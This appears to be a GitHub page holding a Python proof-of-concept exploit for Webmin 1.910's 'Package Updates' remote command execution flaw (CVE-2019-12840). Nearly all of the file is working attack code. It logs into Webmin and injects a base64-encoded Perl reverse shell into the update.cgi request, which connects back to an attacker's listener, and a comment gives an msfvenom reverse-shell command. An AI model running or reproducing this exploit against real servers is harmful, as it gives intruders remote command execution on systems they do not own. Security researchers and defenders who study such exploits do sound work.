-
Notifications
You must be signed in to change notification settings - Fork 2
/
exploit_poc.py
81 lines (60 loc) · 2.98 KB
/
exploit_poc.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
#!/usr/bin/python3
# Exploit Title: Webmin 1.910 - 'Package Updates' Remote Command Execution- Python exploit
# Date: 17 December 2019
# Exploit Author: @NaveenNguyen, @Stormworm29
# Software Link: https://sourceforge.net/projects/webadmin/files/webmin/1.910/
# Version: Webmin 1.910
# Tested on: Ubuntu 18.04.3 LTS
# CVE : 2019-12840
#msfvenom -p cmd/unix/reverse_perl lhost=<attacker_ip> lport=<attacker_port>
#python3 exploit_poc.py --ip_address=<victim_ip> --port=<victim_port> --lhost=<attacker_ip> --lport=<attacker_port> --user=<username> --pass=<password>
import requests
import argparse
import sys
import base64
import urllib.parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def banner():
print("\033[32m")
print("Webmin 1.9101- 'Package updates' RCE")
print("\033[0m")
def payload(lhost_add, lport_add):
print("[+] Generating Payload...")
perl_payload="perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,\"" + str(lhost_add) + ":" + str(lport_add) + "\");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'"
b64_payload = base64.b64encode(perl_payload.encode("utf-8"))
b64payload_Str = str(b64_payload, "utf-8")
bash_payload = 'bash -c "{echo,' + b64payload_Str + '}|{base64,-d}|{bash,-i}"'
url_encoded_payload = urllib.parse.quote(bash_payload)
final_payload = "u=acl%2Fapt&u=%20%7C%20" + url_encoded_payload + "&ok_top=Update+Selected+Packages"
print("[+] Reverse Payload Generated : " + final_payload)
return final_payload
def exploit(url, payload, username, password):
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
login_payload={'user': username ,'pass': password}
revshell_payload= payload
url_login= url+'/session_login.cgi'
url_updates=url+'/package-updates/update.cgi'
cookies = {'redirect':'1','testing':'1','sid':'x'}
s= requests.Session()
headers = {'referer': url}
print("[+] Attempting to login to Webmin")
s.post(url_login, data=login_payload, allow_redirects=False, verify=False, cookies=cookies )
print("[+] Login Successful")
print("[+] Attempting to Exploit")
s.post(url_updates, data=revshell_payload, headers=headers, verify=False)
print('[+] Exploited Successfully')
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--ip_address',help='Enter IP address of the Webmin')
parser.add_argument('--port',help='Enter port value of the Webmin', default=10000)
parser.add_argument('--lhost',help='Enter listener IP address (Attackers IP)')
parser.add_argument('--lport',help='Enter listener port (Attackers port)')
parser.add_argument('--user',help='Enter Username for Webmin')
parser.add_argument('--password',help='Enter Password for Webmin')
args = parser.parse_args()
banner()
final_payload=payload(args.lhost, args.lport)
url_webmin='https://' + str(args.ip_address) + ':' + str(args.port)
exploit(url_webmin, final_payload, args.user, args.password)
if __name__ == "__main__":
main()